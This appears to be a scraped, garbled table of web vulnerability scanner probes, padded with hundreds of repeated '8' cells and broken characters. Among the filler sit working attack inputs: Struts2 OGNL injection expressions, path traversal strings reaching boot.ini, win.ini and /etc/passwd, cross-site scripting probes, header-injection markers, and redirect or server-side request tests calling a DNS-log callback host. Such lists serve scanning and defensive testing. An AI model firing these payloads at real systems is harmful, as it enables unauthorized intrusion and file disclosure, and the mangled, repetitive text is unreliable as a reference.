http://some-inexistent-website.com/some_inexistent_file_with_long_name |
/some_inexistent_file_with_long_name
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
http://some-inexistent-website.com/some_inexistent_file_with_long_name
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
/some_inexistent_file_with_long_name
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://some-inexistent-website.com/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
dir
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
dir |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
http://oxoxoxoxoxoxox.com
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
oxoxoxoxoxoxox.com
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
http://oxoxoxoxoxoxox.com
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
oxoxoxoxoxoxox.com
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
oxoxoxoxoxoxox.com |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
phpinfo |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
http://checkdnslog.jiance.qianxin.com/
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
qqqxss |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
st4r7s>3nd |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
qqqxss
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
qqqxss |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
qqqxss |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
st4r7s>3nd |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
st4r7s"3nd |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
st4r7sJavaScriPt:confirm()3nd |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8'" |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8!(() |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd.php |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ddffdd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')} |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())}
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.jpg |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.html |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..蜡..蜡..蜡..蜡..蜡..蜡..蜡..蜡boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
<..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................windowswin.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
C:\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini |
C:\boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
C:\boot.ini |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8JavaScriPt:confirm() |
8 |
8 |
8 |
8 |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8'" |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..蜡..蜡..蜡..蜡..蜡..蜡..蜡..蜡boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.htm |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.txt |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
file:///c:/boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................windowswin.ini |
../../../../../../../../boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
../../../../../../../../boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡boot.ini |
../../../../../../../../boot.ini.jpg
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.jpg |
../../../../../../../../boot.ini.html
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.html |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini |
C:\boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
C:\boot.ini |
..\..\..\..\..\..\..\..\boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\boot.ini |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................windowswin.ini |
................etc/passwd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................etc/passwd |
..\..\..\..\..\..\..\..\etc/passwd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
................etc/passwd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
|
';?>
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
';?> |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')}
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')} |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())}
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${#context['com.opensy' 'mphony.xwork2.disp' 'atcher.HttpServlet' 'Response'].addHeader('s2045we' 'bscan' 'test','vul')} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='###Vul').(#cmd=#cmd 'nerable###').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.write(#cmd.getBytes())).(#ros.flush())} |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡喇喇蜡boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.jpg |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.html |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
C:\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.htm |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini.txt |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
../../../../../../../../boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
file:///c:/boot.ini |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
................etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..蜡..蜡..蜡..蜡..蜡..蜡..蜡..蜡etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..蜡..蜡..蜡..蜡..蜡..蜡..蜡..蜡etc/passwd |
..\..\..\..\..\..\..\..\etc/passwd
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
..\..\..\..\..\..\..\..\etc/passwd |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
/some_inexistent_file_with_long_name |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
SomeCustomInjectedHeader:injected_by_test
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
SomeCustomInjectedHeader:injected_by_test |
http://checkdnslog.jiance.qianxin.com/
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
http://checkdnslog.jiance.qianxin.com/ |
8
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |
${87654321-12345678}
|
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
8 |
${87654321-12345678} |